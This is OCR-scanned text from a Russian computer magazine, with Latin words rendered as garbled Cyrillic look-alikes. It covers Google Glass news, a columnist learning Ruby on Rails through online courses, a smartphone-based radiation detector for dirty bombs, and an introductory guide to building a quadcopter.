— 7 Торрент-трафик сдает позиции. 

На данный момент ВИТоггепІ генерирует 
35% иріоасі-трафика, что меньше, чем 
в прошлые годы, но тоже ощутимо. Однако 
стоит учесть, что 331-трафик в последний 
год увеличился в два раза: с 2,5 до 5,4%. 
Быть может, пользователи стали умнее 
и просто пользуются ѴРМ-сервисами. 
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ПЯТИМИНУТКА 

(300<31_Е<31_А83 

ВСЕ НОВОЕ О ЧУДО-ОЧКАХ ОТ СООСІ.Е 

округ амбициозного проекта Соодіе СІазз все время что-то происходит, 
и ажиотаж плавно подогревается тем, что отзывов конкретных пользователей 
и «очевидцев» до сих пор очень мало. Представляем тебе подборку наиболее 
интересных новостей из стана проекта. 

Как известно, Соодіе СІазз работают под управлением АпсІгоісІ. Разумеет- 
ся, его попытались взломать. Основатель проекта Сугііа Джей Фримен в своем твиттере 
отчитался о том, что сумел получить гооі -доступ к операционной системе очков Ехріогег 
ЕсІШоп, предназначенных для разработчиков приложений. Для достижения своей цели 

Фримен воспользовался известным ба- 
гом в АпсІгоісІ 4.0.4 и преуспел. Хакер пи- 
шет, что это было на удивление легко. 
Пока непонятно, сработает ли этот метод 
для коммерческих экземпляров, ведь 
Соодіе оставила за собой право дистан- 
ционно блокировать устройства при не- 
обходимости. Тем не менее начало по- 
ложено. В своем блоге (заш ік.сот/ісІ/Ш } 
Фримен замечает, что взлом очков может 
оказаться куда более неприятной вещью, 
чем взлом мобильника или даже компью- 
тера. Хакнув очки и имея впоследствии 
удаленный доступ к ним, «злоумышленник 
сможет не только наблюдать за каждым 
вашим шагом, он будет также наблюдать 
буквально за всем, что вы смотрите, слы- 
шите и делаете», — пишет Фримен. 

Еще одна не очень радужная новость 
пришла от самой корпорации Соодіе. Там 
признали, что использование очков мо- 
жет вызвать головную боль и снижение зрения. Из-за большого напряжения для глаз 
Соодіе СІазз также не рекомендовано использовать детям младше 13 лет. В общем-то, 
эта информация неудивительна, но, пожалуй, ложка дегтя не повредит ажитации вокруг 
проекта. 

Однако самой интересной из последних новостей, наверное, можно назвать реакцию 
на Соодіе СІазз Эрика Шмидта — председателя совета директоров Соодіе. Непродолжи- 
тельное время поносив устройство на себе, Шмидт, похоже, не пришел в восторг. Он рас- 
сказал, что не представляет ситуации, в которой СІазз смогли бы распространиться так 
же массово, как это случилось со смартфонами. Главным препятствием для этого Шмидт 
назвал пресловутое голосовое управление, сославшись на него как на «жуткую и стран- 
ную штуку». «Из-за необходимости громко разговаривать с очками Соодіе СІазз будет не- 
уместен во множестве мест», — считает Шмидт. Будущее очков дополненной реальности 
Шмидт скорее видит в промышленности или на массовом рынке, но лишь в том случае, 
если СІазз со временем «растворятся» в обычных очках. 



Главным препят- 
ствием для распро- 
странения СІазз 
Шмидт назвал го- 
лосовое управление, 
сославшись на него 
как на «жуткую 
и странную 
штуку» 





МОЛИНЬЕСОЗДАЕТ 

БОГОВ 



— ^ Игровой разработчик Питер Молинье подвел итоги 
своего социального эксперимента под названием 
Сигіозііу — МДіаІ’з Іпзісіе ІІте СиЬе? Загадку куба разгадал 
18-летний Брайан Хендерсон. Он выиграл... возмож- 
ность стать богом в Собиз {влияя на игровой процесс), 
следующей игре 22Сапз. 




СУШИЛКА 
ДЛЯ ГАДЖЕТОВ. 
ВЫЖИВАЕМОСТЬ 80% 

— > Штуку под названием ОгуВох придумали и соби- 
раются патентовать в США. Это специальная камера 
для сушки «утопленных» гаджетов с помощью тепла, 
вакуумного насоса и света. Стоимость процедуры 
20-40 долларов; устройство уже можно встретить 
в магазинах и общественных местах. 




Соодіе анонсировала 
уже семь программ 
для СІавв, среди 
которых социаль- 
ные приложения 
РасеЬоок, Т\ѵі1*ег 
и ТишЫг. А сторонние 
разработчики уже 
заявляют о желании 
создавать для ОІазз... 
порноприложения. 
Порноиндустрия, 
как всегда, на острие 
прогресса 




АТЫ ПОМНИШЬ 
ЫЕѴЕННООО? 



— > В популярнейший набор ЗситтѴМ добавили 
поддержку культового квеста ТНе МеѵегйоосІ. Собрать 
эти 36 тысяч строк кода удалось в основном при по- 
мощи реверс-инжиниринга и упорства. Занимались 
этим почти три года. Увы, поддержки «того самого» 
русского перевода пока нет. 







Неайег 
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В Сосіе ЗсМоо! можно 
программировать прямо 
в браузере, выполняя за- 
дания курса 




КОЛОНКА 

СТЁПЫ 

ИЛЬИНА 



КАК Я УЧИЛ 

ПІІВѴ ОЫ ПАІІ.З ЗА ТРИ НОЧИ. 
И ТАК И НЕ ВЫУЧИЛ 



ЗАВИСШАЯ ЗАДАЧА 

Я уже давно хотел изучить ВиЬу оп Ваііз на каком- 
то базовом уровне. Без конкретной цели. Ско- 
рее просто для себя, чтобы лучше понять, что же 
в нем такого особенного (в отличие от 100500 
других технологий и фреймворков), что позволя- 
ет быстро создавать и масштабировать доволь- 
но нагруженные интернет-проекты. Вторичной 
причиной стало желание попробовать новые 
подходы к обучению. Когда я учился на програм- 
миста, у нас были только книги и форумы, где 
можно спросить совета. Сейчас есть интерактив- 
ные учебники и онлайн- школы программистов, 
огромное количество скрин кастов (почти мечта: 
смотреть, как программируют гуру), базы знаний 
вроде зіаскоѵегііоѵѵ.сот и тонны исходных кодов 
на СЗіШиЬ, где можно часами изучать исходники 
настоящих профи. Следующие несколько ночей 
(а днем банально некогда) я решил выделить 
на то, чтобы попробовать новые способы обуче- 
ния в действии. 

НОЧЬПЕРВАЯ 

Начинать учить ВиЬу оп Ваііз без хотя бы мини- 
мального знания непосредственно ВиЬу было 
бы странным. Я уже когда-то брался за интерак- 
тивный гид ш.ЬулІапд.огд. Но как прошел его, 
так и сразу все забыл. Его создатели обещают, 
что на прохождение и усвоение синтаксиса ВиЬу 
уйдет пятнадцать минут. У меня ушло тридцать. 
Правда, с постоянным отвлечением на Тѵѵійег. 
Процесс выглядит примерно так. Тебе говорят: 
«Массивы в ВиЬу объявляются так, а данные 
из массивов извлекают вот так. Теперь давай 
попробуй сделать массив и извлечь из него N 
элементов. А мы проверим». Читаешь, как все 
устроено, и сразу пробуешь. ВиЬу ты так, конечно, 
не выучишь. Лучше это воспринимать как супер- 
экспресс-курс, который работает. 

И все-таки сам ВиЬу — это очень далеко 
от фреймворка ВиЬу оп Ваііз, Хотелось освоить 
именно рельсы. Из нашей статьи про образова- 



ние онлайн я точно помнил о нашумевшем курсе 
Ваііз ^ог ЕотЬіез (гаіІзіогготЬіѳз.ога ). Это так 
же, как и Тгу ВиЬу, интерактивный учебник, кото- 
рый прямо с места в карьер начинает тебя учить 
готовить рельсовые приложения. Сначала тебе 
читают мини-лекцию (на английском, но все пре- 
дельно понятно — включи субтитры) о структуре 
файлов рельсового приложения, СВЬЮ-подходе 
для работы с данными, объясняют, как реализо- 
вана модель МѴС в рельсах, и так далее. После 
каждого видео тебе предлагают выполнить за- 
дания на закрепление материала. Все кажется 
простым и понятным, курс пролетает незаметно 
за час-другой (он небольшой). Но! Почувствовал 
ли я после курса, что смогу написать рельсовое 
приложение? Увы, нет! 

НОЧЬ ВТОРАЯ 

Одна из причин, почему после Ваііз ^ог ІотЬіез 
появляются некоторые базовые знания, но не по- 
является уверенности, — это виртуальная среда, 
в которой проходит обучение. С одной стороны, 
она до предела уменьшает порог входа: можно 
не заботиться об окружении. С другой стороны, 
ничего реального по ходу дела ты не создаешь — 
никакого тебе «НеІІо ѴѴогІб» на выходе. И главное, 
с какой стороны подступаться к его созданию, 
непонятно. С этого момента я хотел попробовать 
ВиЬу оп Ваііз в деле, реально установив его в си- 
стеме (до этого можно было даже не стараться), 
и с нуля создать простое приложение. 

Уже не помню как, но совершенно случайно 
я наткнулся на очень удачный курс скринкастов 
на русском языке ( гаіІз.ЬазЬі аігз.гі. ). Спасибо ав- 
тору за грамотное изложение: он методично объ- 
ясняет принципы работы рельсового приложения 
в деталях, по ходу погружая тебя во все необхо- 
димые тонкости. Короче говоря, всю вторую ночь 
эксперимента я смотрел первую половину из бо- 
лее чем тридцати эпизодов этих скринкастов. 

В голове окончательно закрепилась картин- 
ка, как генерируется приложение, как работать 



с рельсовой консолью, как создать модели и ми- 
грации, как обновлять модели и как вал иди ро- 
вать в них данные, ВЕЗТТиІ-контроллеры и так 
далее. Смотря каждый из эпизодов, я сразу про- 
бовал все в действии, выстраивая полностью 
рабочее рельсовое приложение. Стало понятно, 
как в принципе устроены рельсы. 

НОЧЬ ТРЕТЬЯ 

На третью ночь остались последние эпизо- 
ды скринкастов, которые удалось посмотреть 
в один присест: работа с рельсами уже не ка- 
залась такой дикой. В этот момент мне кто-то 
рассказал о том, что у курса Ваііз Іог 2оплЬіез 
есть толковое и гораздо более глубокое про- 
должение. Правда, курс уже платный и хостится 
в рамках школы программирования Сосіе ЗсЬооІ 

( ш ізсИ к ік ;от ). Отдать 25 баксов, чтобы 

получить доступ ко всем курсам школы, было 
не жалко. Это стоимость на месяц, поэтому, если 
не понравится, не забудь отменить подписку. 

Курс Ваііз Іог ІотЬіез 2 действительно ока- 
зался очень удачным. Правда, многое стало по- 
вторением того, что я увидел в скринкастах, — 
но это было даже отчасти приятно. Пять уровней 
и пять блоков упражнений, которые делаешь 
прямо в интерактивной консоли. К этому момен- 
ту рельсы уже казались логичными, понятными 
и пригодными к использованию. 

ЧТО ДАЛЬШЕ? 

Научился ли я делать сложные проекты? Нет. 
Но точно осознал подходы, используемые 
в рельсах, и понял их удобство. Научился бы- 
стро создавать простые приложения и в су- 
перкороткий срок наращивать его функционал 
с помощью гемов, написанных сообществом. 
Я поймал кураж и дальше с удовольствием 
учусь лучшим практикам по программам Собе 
ЗсЬооІ (сейчас смотрю курс по юнит-тестам). 
И меня чертовски радует то, что изучать техно- 
логии стало так просто, зс 
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СМАРТФОНЫ С КАМЕРАМИ 
КАК ДЕТЕКТОР ГРЯЗНОЙ БОМБЫ 







1- Радиация 

достигает 

смартфона 




3. Телефон сообщает 
об инциденте 



2 . Сообщение реги- 
стрируется програм- 
мным обеспечением 





4 - Собираются 
данные на сенсо- 
ра камеры 



5- Время 
и координаты 
события отобра- 
жаются на карте 



Рис. 1 . Схема работы системы Се II РАО 



ЧТО ЭТО ТАКОЕ 

Национальная лаборатория в Айдахо (США) раз- 
работала систему СеІІНАй П,и5а.аоѵ/1140Ѵ1Ь ) — 
распределенный детектор радиоактивного 
излучения, созданный для выслеживания терро- 
ристов, которые везут грязную бомбу. 

Система СеІІРАО предполагает установку 
программного детектора на АпеІгоісІ -смартфоны 
пользователей. Принцип работы системы по- 
казан на рис. 1 и 2. Утилита постоянно рабо- 
тает в фоновом режиме. Как только телефон 
зарегистрировал повышение радиации, про- 
грамма просыпается и отправляет сообщение 
в центральный штаб, оттуда ведется монито- 
ринг и управление распределенным детектором 
СеІІРАО. Операторы в штабе получают инфор- 
мацию со всех мобильных телефонов, где уста- 
новлена программа. Информация наносится 
на радиационную карту, которая обновляется 
в реальном времени (рис. 3). 

ЗАЧЕМ ЭТО НУЖНО 

Грязная бомба — это бомба из обычной взрыв- 
чатки, куда добавляют радиоактивные материа- 
лы. Взрыв не приводит к особым разрушениям, 
зато заражает большую территорию. Одна бом- 
ба среднего размера может сделать необитае- 
мым целый мегаполис, а также пригороды в ра- 
диусе нескольких десятков километров. Лучше 
всего для изготовления грязной бомбы подходит 
отработанное ядерное топливо. 

Американцы боятся, что следующий теракт 
в США совершат именно с применением гряз- 
ной бомбы. Вполне возможно, что этот страх 
имеет под собой основания: сейчас атомные 
станции начинают строить в развивающихся 
странах, таких как Иран, и в этом случае отсле- 
дить отработанное топливо может оказаться 
проблематично. 



При транспортировке грязной бомбы терро- 
ристы неизбежно будут проезжать мимо людей 
с мобильными телефонами. Если программу 
СеІІВАО поставят себе многие граждане, то бом- 
бу удастся заблаговременно обнаружить. 

КАК ЭТО РАБОТАЕТ 

Информация собирается с фотографий, кото- 
рые делает камера смартфона. Светочувстви- 
тельный КМОП-сенсор цифровой камеры реги- 
стрирует фотоны. В то же время большинство 
радиоактивных материалов излучают высоко- 
энергетические фотоны (гамма-кванты), кото- 
рые специфическим образом искажают изобра- 
жение. Внешне это проявляется как тепловой 
шум из красных точек на фото и видео. Подоб- 
ные искажения можно выявить программно. 

Кстати, детектор гамма-излучения такого типа 
под торговой маркой ОаплплаРіх запатентован 
в 2005 году: см. американские патенты 7391028 
и 7737410 и ряд других зарубежных патентов. 



Сейчас в каталогах приложений есть несколь- 
ко программных гамма-детекторов и под АпеІгоісІ, 
и под ЮЗ. Все они работают схожим образом — 
как счетчик Гейгера. Например, есть француз- 
ская программа ѴѴікізепзог ( Ікіі )г.іг ) и та же 
СаттаРіх ( даттаріх.сот ) в бесплатной Ре- 
версии под АпеІгоісІ и платной версии под ЮЗ. По- 
сле аварии на Фукусиме немецкий программист 
Рольф-Дитер Кляйн (ВоІТ-ОіеІег КІеіп) разработал 
программу Вабіоасііѵііу Соипіег ( ІІІу/ЮсІРіО), 
чтобы помочь людям в зараженных регионах. 

Новаторство системы СеІІРАО заключается 
в создании распределенной системы, состоя- 
щей из тысяч или миллионов мобильных теле- 
фонов. Все они будут работать как гигантский 
детектор радиации, национальная сеть защиты 
от ядерной угрозы. Особенно эффективной си- 
стема будет в крупных городах и местах с боль- 
шим скоплением народа, как, например, тури- 
стические объекты. А это как раз и есть самые 
привлекательные цели для террористов. 31 




Рис. 2. Программа 
работает на не- 
модифицированных 
телефонах АпеІгоісІ 
и использует КМОП- 
сенсор для измере- 
ния гамма-излучения 




Рис. 3. Черные и цвет- 
ные отметки показы- 
вают передвижения 
человека, на телефоне 
которого установлена 
программа СеІІРАО 
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ЧТО ТАКОЕ КВАДРО КО Л ТЕР И ДЛЯ ЧЕГО ЭТО НАДО 

Мультироторы, они же мультикоптеры или просто коптеры, — 
это беспилотные летательные аппараты, предназначенные 
для развлечения, съемки фото и видео с воздуха или отработки 
автоматизированных систем. 

Коптеры обычно различают по числу используемых мото- 
ров — начиная от бикоптера с двумя моторами (как СипЗЫр 
из фильма «Аватар») и заканчивая октакоптером с восемью. 
На самом деле число моторов ограничено только твоей фан- 
тазией, бюджетом и возможностями полетного контроллера. 
Классическим вариантом является квадрокоптер с четырь- 
мя моторами, расположенными на перекрещивающихся 
лучах. Такую конфигурацию еще в 1920 году попытался со- 
орудить француз Этьен Омишен (Ёііеппе ОеІптісМеп), и в 1922 
году у него это даже получилось. По сути, это самый простой 
и дешевый вариант сделать летательный аппарат, способный 
без особых проблем поднимать в воздух небольшие камеры 
вроде СоРго. Но если ты собираешься взлетать с серьезной 
фото- и видеотехникой, то стоит выбирать коптер с большим 
числом моторов — это не только увеличит грузоподъемность, 
но и добавит надежности, если в полете выйдет из строя один 
или несколько моторов. 

ТЕОРИЯ ПОЛЕТА 

В теории полета (аэродинамике) принято выделять три угла 
(или три оси вращения), которые задают ориентацию и направ- 
ление вектора движения летательного аппарата. Проще говоря, 
летательный аппарат куда-то «смотрит» и куда-то двигается. 
Причем двигаться он может не туда, куда «смотрит». Даже са- 
молеты в полете имеют какую-то составляющую «сноса», кото- 
рая уводит их от курсового направления. А вертолеты вообще 
могут летать боком. 

Три эти угла принято называть крен, тангаж и рыскание. 
Крен — это поворот аппарата вокруг его продольной оси (оси, 
которая проходит от носа до хвоста). Тангаж — это поворот во- 
круг его поперечной оси (клюет носом, задирает хвост). Рыска- 
ние — поворот вокруг вертикальной оси, больше всего похожий 
на поворот в «наземном» понимании. 

В классической схеме вертолета основной винт при помо- 
щи автомата перекоса лопастей управляет креном и тангажем. 
Так как основной винт обладает ненулевым сопротивлением 
воздуха, у вертолета возникает вращающий момент, направ- 




Кстати, листовой алю- 
миний можно заменить 
на стеклотекстолит. 
Его тоже можно купить 
в Митино. Лучше брать 
нефольгированный, 
зачем нам фольга? 




Биколтеры и конфи- 
гурации с нечетным 
количеством винтов 
управляются немного 
по-другому. Там компен- 
сация вращения идет 
за счет поворотного узла 
с сервоприводом («сер- 
вой»), который отклоняет 
мотор с пропеллером, 
меняя направление воз- 
душного потока. 




Основные маневры (слева направо): движение по прямой , крен/тангажи рыскание 



Несмотря на то что квадрокоптеры 
крайне модная тема, выбирать ком- 
поненты для сборки своего аппарата 
по-прежнему не так просто. Выбор 
деталей для конкретного проекта — 
это мучительный поиск оптимального 
сочетания веса, мощности и функ- 
циональности. Поэтому прежде, чем 
окунуться в мир бесчисленных интер- 
нет-магазинов и безымянных китай- 
ских производителей, давай проде- 
лаем подготовительную работу. 












СОѴЕЙЗТОЯУ 
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Бикоптеры и конфигурации с нечетным 
количеством винтов управляются 
немного по-другому. Там компенсация 
вращения идет за счет поворотного узла 
с сервоприводом (« сервой »), который 
отклоняет мотор с пропеллером, меняя 
направление воздушного потока 



хороший онлайн-калькулятор есаІс.сИ . Но прежде чем вбивать 
в него данные, нужно сформулировать требования к будущему 
аппарату. Будешь ли ты устанавливать на аппарат камеру или 
другую технику? Насколько быстрым должен быть аппарат? 
Как далеко тебе нужно летать? Давай посмотрим на характери- 
стики различных компонентов. 




РАМА 

Основной момент, который нужно решить при выборе рамы, — 
будешь ли ты использовать готовую раму или же делать ее сам. 
С готовой рамой все проще, да и заказывать в любом случае 
придется множество деталей. При этом, учитывая цены в ки- 
тайских магазинах, самодельный вариант может оказаться до- 
роже. С другой стороны, собственную раму в случае аварии бу- 
дет проще починить. Ну и, естественно, своими руками можно 
сделать любую, даже самую сумасшедшую конструкцию. Рас- 
смотрим поподробнее самосборный вариант. 

Сделать раму можно из любых подручных материалов {дере- 
во, алюминий, пластик и так далее). Можно подойти чуть серьез- 
нее и выпилить ее на ЧПУ-станке из плетеного карбона, причем 
можно усложнить задачу и сделать складную конструкцию. 

Самый простой вариант для любителей ОІУ — пойти в ОВІ, 
«Леруа Мерлен» или на строительный рынок и купить квадрат- 
ную алюминиевую трубу 12 * 12, а также алюминиевый лист 
толщиной в 1,5 мм. Для того чтобы сделать раму из таких ма- 
териалов типа «четыре палки и крепеж», достаточно дрели или 
ножовки по металлу. Но нужно быть готовым к тому, что такая 
конструкция прослужит недолго. Все-таки все эти профили 
делают из очень мягкого материала (АДЗІ/АДЗЗ), при полетах 
он будет легко гнуться. 

В качестве образца для твоей рамы можно взять упрощен- 
ную заводскую раму или же найти в интернете готовый чертеж. 
Более сложные материалы (например, углепластик) можно за- 
менить на алюминий — если и получится тяжелее, то ненамно- 
го. В любом случае стоит обращать внимание на длину и симме- 
тричность лучей. Длина лучей выбирается исходя из диаметра 
используемых пропеллеров, так, чтобы после их установки 
расстояние между окружностями вращающихся винтов было 
не менее 1-2 см, и уж тем более эти окружности не должны пе- 
ресекаться. Моторы, устанавливаемые на лучах, должны быть 
равноудалены от центра рамы, где будет располагаться «мозг», 
и (в большинстве случаев) находиться на одном расстоянии 
друг от друга, образуя равносторонний многоугольник. 

При проектировании стоит учесть, что центр рамы должен 
совпадать с центром тяжести, поэтому установить аккумулятор 
сзади между лучами — плохая идея, если он не будет ском- 
пенсирован грузом спереди, например камерой. Продумай, 
на что будет приземляться твой аппарат, для новичков можно 
посоветовать приспособить что-то мягкое на «пузе» или кон- 
цах лучей, например плотный поролон или теннисные мячики. 
А также защити аккумулятор на случай неудачного приземле- 
ния, например установи его между пластинами рамы или рас- 
положи под высокими посадочными лыжами. 

МОТОРЫ И ПРОПЕЛЛЕРЫ 

Из-за вращения моторов в разные стороны приходится исполь- 
зовать разнонаправленные пропеллеры: прямого вращения 
(против часовой) и обратного вращения (по часовой). Обычно 
используются двухлопастные пропеллеры, их легче баланси- 
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ленный в сторону, противоположную вращению винта, и, чтобы 
его скомпенсировать, у вертолета есть хвостовой винт. Изменяя 
производительность хвостового винта (оборотами или шагом), 
классический вертолет управляет своим рысканием. 

В нашем же случае все сложнее. У нас есть четыре винта, 
два из них вращаются по часовой стрелке, два — против часо- 
вой. В большинстве конфигураций используются винты с неиз- 
меняемым шагом и управлять можно только их оборотами. Если 
они все будут вращаться с одинаковой скоростью, то они ском- 
пенсируют друг друга: рыскание, крен и тангаж будут нулевыми. 

Если мы увеличим обороты одного винта, вращающегося 
по часовой стрелке, и уменьшим обороты другого винта, вра- 
щающегося по часовой стрелке, то мы сохраним общий момент 
вращения и рыскание по-прежнему будет нулевым, но крен или 
тангаж (в зависимости от того, где мы сделаем ему «нос») из- 
менятся. А если мы увеличим обороты на обоих винтах, враща- 
ющихся по часовой стрелке, а на винтах, вращающихся против 
часовой стрелки, уменьшим (чтобы сохранить общую подъем- 
ную силу), то возникнет вращающий момент, который изменит 
угол рыскания. Понятное дело, что все это будем делать не мы 
сами, а бортовой компьютер, который будет принимать сигнал 
с ручек управления, добавлять поправки с акселерометра и ги- 
роскопа и крутить винтами, как ему надо. 

Для того чтобы спроектировать коптер, необходимо найти 
баланс между весом, временем полета, мощностью двигателей 
и другими характеристиками. Все это зависит от конкретных 
задач. Все хотят, чтобы коптер летал выше, быстрее и дольше, 
но в среднем время полета составляет от 10 до 20 минут в за- 
висимости от емкости аккумулятора и общего полетного веса. 
Стоит запомнить, что все характеристики связаны между собой 
и, к примеру, увеличение емкости аккумулятора приведет к уве- 
личению веса и, как следствие, к уменьшению времени полета. 
Чтобы узнать, сколько примерно твоя конструкция будет висеть 
в воздухе и сможет ли вообще оторваться от земли, существует 
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ровать и найти магазинах; в то время как трехлопастные дадут 
больше тяги при меньшем диаметре винта, но доставят много 
головной боли при балансировке. Плохой (дешевый и неотба- 
лансированный} пропеллер может развалиться в полете или 
вызвать сильные вибрации, которые передадутся на датчики 
полетного контроллера. Это приведет к серьезным пробле- 
мам со стабилизацией и вызовет сильное смазывание и «желе» 
на видео, если ты снимаешь что-то с коптера или летаешь с ви- 
дом от первого лица. 

У любого пропеллера есть два основных параметра: диаметр 
и шаг Их обозначают по-разному: 10 х 4.5, 10 * 45 или просто 
1045. Это означает, что диаметр пропеллера 10 дюймов, а его 
шаг 4,5 дюйма. Чем длиннее пропеллер и больше шаг, тем боль- 
шую тягу он сможет создавать, но при этом повысится нагрузка 
на мотор и увеличится потребление тока, в результате он может 
сильно перегреться и электроника выйдет из строя. Поэтому 
винты подбираются под мотор. Ну или мотор под винты, тут 
как посмотреть. Обычно на сайтах продавцов моторов можно 
встретить информацию о рекомендуемых пропеллерах и акку- 
муляторах для выбранного мотора, а также тесты создаваемой 
тяги и эффективности. Существуют и пропеллеры с изменяе- 
мым шагом, что в теории повысит маневренность, но в реаль- 
ности добавит сложную механику, имеющую свойство изнаши- 
ваться и ломаться с последующим дорогостоящим ремонтом. 

Также чем больше винт, тем больше его инерция. Если нуж- 
на маневренность, лучше выбрать винты с большим шагом или 
трехлопастные. Они при том же размере создают тягу в 1,2- 
1,5 раза больше. Понятно, что винты и скорость их вращения 
нужно подбирать так, чтобы они смогли создать тягу большую, 
чем вес аппарата. 

И наконец, бесколлекторные моторы. У моторов есть клю- 
чевой параметр — кѴ. Это количество оборотов в минуту, ко- 
торые сделает мотор, на поданный вольт напряжения. Это 
не мощность мотора, это его, скажем так, «передаточное чис- 
ло». Чем меньше кѴ, тем меньше оборотов, но выше крутящий 
момент. Чем больше кѴ при той же мощности, тем больше обо- 
ротов и ниже момент. При выборе мотора ориентируются на то, 
что в штатном режиме он будет работать при мощности 50% 
от максимальной. Не стоит думать, что чем кѴ больше — тем 
лучше, для коптеров с типичной 38-батареей рекомендуемое 
число находится в диапазоне от 700 до 1000 кѴ. 

ПИТАНИЕ И КОНТРОЛЛЕРЫ ПИТАНИЯ 

Капитан подсказывает: чем больше мощность мотора, тем 
больше батарейка ему нужна. Большая батарейка — это 
не только емкость (читай, время полета), но и максимальный 
ток, которая она отдает. Но чем больше батарейка, тем больше 
и ее вес, что вынуждает скорректировать наши прикидки отно- 
сительно винтов и моторов. 

На сегодняшний день все используют литий-полимерные 
батарейки (І_іРо). Они легкие, емкие, с высоким током разряд- 
ки. Единственный минус — при отрицательных температурах 
работают плохо, но если их держать в кармане и подключать 
непосредственно перед полетом, то во время разряда они 
сами слегка разогреваются и не успевают замерзнуть. УРо- 
элементы вырабатывают напряжение 3,7 В. 

При выборе батареи стоит обращать внимание на три ее 
параметра: емкость, измеряемую в миллиампер-часах, макси- 
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малыный ток разряда в емкостях аккумулятора (С) и число яче- 
ек (8). Первые два параметра связаны между собой, и при их 
перемножении ты узнаешь, сколько тока сможет отдавать этот 
аккумулятор продолжительное время. Например, твои моторы 
потребляют 10 А каждый и их четыре штуки, а батарея имеет 
параметры 2200 мА * ч 30/40С, таким образом, коптеру требу- 
ется 4 * 10 А = 40 А, а батарея может выдавать 2,2 А ■ 30 = 66 А 
или 2,2 А ■ 40 = 88 А в течение 5-10 секунд, что явно будет до- 
статочно для питания аппарата. Также эти коэффициенты на- 
прямую влияют на вес аккумулятора. Внимание! Если тока бу- 
дет не хватать, то в лучшем случае батарея надуется и выйдет 
из строя, а в худшем загорится или взорвется; это же может 
произойти при коротком замыкании, повреждении или непра- 
вильных условиях хранения и зарядки, поэтому используй спе- 
циализированные зарядные устройства, аккумуляторы храни 
в специальных негорючих пакетах и летай с «пищалкой», которая 
предупредит о разрядке. Число ячеек (8) указывает на количе- 
ство УРо-элементов в батарее, каждый элемент выдает 3,7 В, и, 
например, 38-аккумулятор будет отдавать примерно 11,1 В. Сто- 
ит обращать внимание на этот параметр, так как от него зависят 
скорость оборотов моторов и тип используемых регуляторов. 

Элементы батареи объединяют последовательно или па- 
раллельно. При последовательном включении увеличивается 
напряжение, при параллельном — емкость. Схему подключе- 
ния элементов в батарее можно понять по ее маркировке. На- 
пример, 331 Р (или просто 33) — это три последовательно под- 
ключенных элемента. Напряжение такой батареи будет 11,1 В. 
432Р — это восемь элементов, две группы, подключенных па- 
раллельно по четыре последовательных элемента. 

Однако моторы подключаются к батарее не напрямую, а че- 
рез так называемые регуляторы скорости. Регуляторы скоро- 
сти (они же «регули» или ЕЗС) управляют скоростью вращения 
моторов, заставляя твой коптер балансировать на месте или 
лететь в нужном направлении. Большинство регуляторов име- 
ют встроенный стабилизатор тока на 5 В, от которого можно 
питать электронику (в частности, «мозг»), можно использовать 
отдельный стабилизатор тока (ЭВЕС). Выбираются контрол- 
леры скорости исходя из потребления мотором тока, а также 
возможности перепрошивки. Обычные регули довольно мед- 
лительны в плане отклика на поступающий сигнал и имеют мно- 
жество лишних настроек для копте ростр о ительства, поэтому их 
перепрошивают кастомными прошивками ЗітопК или ВШеІІ. 
Китайцы и тут подсуетились, и часто можно встретить регу- 
ляторы скорости с уже обновленной прошивкой. Не забывай, 
что такие регули не следят за состоянием аккумулятора и могут 
разрядить его ниже 3,0 В на банку, что приведет к его порче. 
Но в то же время на обычных ЕЗС стоит переключить тип ис- 
пользуемого аккумулятора с УРо на ІМіМН или отключить умень- 
шение оборотов при разрядке источника питания (согласно 
инструкции), чтобы под конец полета внезапно не отключился 
мотор и твой беспилотник не упал. 

Моторы подключаются к регулятору скорости тремя прово- 
дами, последовательность не имеет значения, но если поме- 
нять любые два из трех проводов местами, то мотор будет вра- 
щаться в обратном направлении, что очень важно для коптеров. 

Два силовых провода, идущих от регулятора, надо под- 
ключить к батарейке. НЕ ПЕРЕПУТАЙ ПОЛЯРНОСТЬ! Вообще, 
для удобства регуляторы подключают не к самой батарейке, 
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а к так называемому Роѵі/ег Оізй'іЬЩіоп МобШе — модулю рас- 
пределения энергии. Это, в общем-то, просто плата, на которой 
припаяны силовые провода регуляторов, распаяны разветвле- 
ния для них и припаян силовой кабель, идущий к батарее. Ко- 
нечно, батарею не надо припаивать, а надо соединить через 
разъем. Ты же не хочешь перепаивать батарею каждый раз, 
как она сядет. 

БОРТОВОЙ КОМПЬЮТЕР И СЕНСОРЫ 

Выбор полетных контроллеров для коптеров очень велик — на- 
чиная от простого и дешевого КарІеіпКІЖ и нескольких ореп 
зоигсе проектов подАгбиіпо-совместимые контроллеры до до- 
рогого коммерческого ЭЛ ѴѴоокопд. Если ты настоящий хакер, 
то закрытые контроллеры тебя не должны сильно интересо- 
вать, в то время как открытые проекты, да еще и основанные 
на популярной ардуинке, привлекут многих программистов. 

О возможностях любого полетного контроллера можно су- 
дить по используемым в нем датчикам: 

• гироскоп позволяет удерживать коптер под определенным 
углом и стоит во всех контроллерах; 

• акселерометр помогает определить положение коптера 
относительно земли и выравнивает его параллельно гори- 
зонту (комфортный полет); 

• барометр дает возможность удерживать аппарат на опре- 
деленной высоте. На показания этого датчика очень сильно 
влияют потоки воздуха от пропеллеров, поэтому стоит пря- 
тать его под кусок поролона или губки; 

• компас и СРЗ вместе добавляют такие функции, как удержа- 
ние курса, удержание позиции, возврат наточку старта и вы- 
полнение маршрутных заданий (автономный полет). К уста- 
новке компаса стоит подойти внимательно, так как на его 
показания сильно влияют расположенные рядом металли- 
ческие объекты или силовые провода, из-за чего «мозги» 
не смогут определить верное направление движения; 

• сонар или УЗ-дальномер используется для более точного 
удержания высоты и автономной посадки; 

• оптический сенсор от мышки используется для удержания 
позиции на малых высотах; 

• датчики тока определяют оставшийся заряд аккумулятора 
и могут активировать функции возврата на точку старта или 
приземление. 

Сейчас существует три основных открытых проекта: 
МиІІіѴѴіі, АгбиСорІег и его портированная версия МедаРігаІеМС. 
МиІІіѴѴіі самый простой из них, для запуска требует Агсіиіпо 
с процессором 328р, 32и4 или 1280/2560 и хотя бы одним дат- 
чиком-гироскопом. АгбиСорІег — проект, напичканный всевоз- 
можным функционалом от простого висения до выполнения 
сложных маршрутных заданий, но требует особого железа, 
основанного на двух чипах АТтеда. МедаРігаІеЫС — это клон 
АгбиСорІег, который способен запускаться на обычной ардуине 
с чипом 2560 и минимальным набором датчиков из гироскопа, 
акселерометра, барометра и компаса. Поддерживает все те же 
возможности, что и оригинал, но всегда догоняет в развитии. 

С железом для открытых проектов аналогичная ситуация, 
как и с рамами для коптера, то есть ты можешь купить готовый 
контроллер или собрать его самостоятельно с нуля или на ос- 
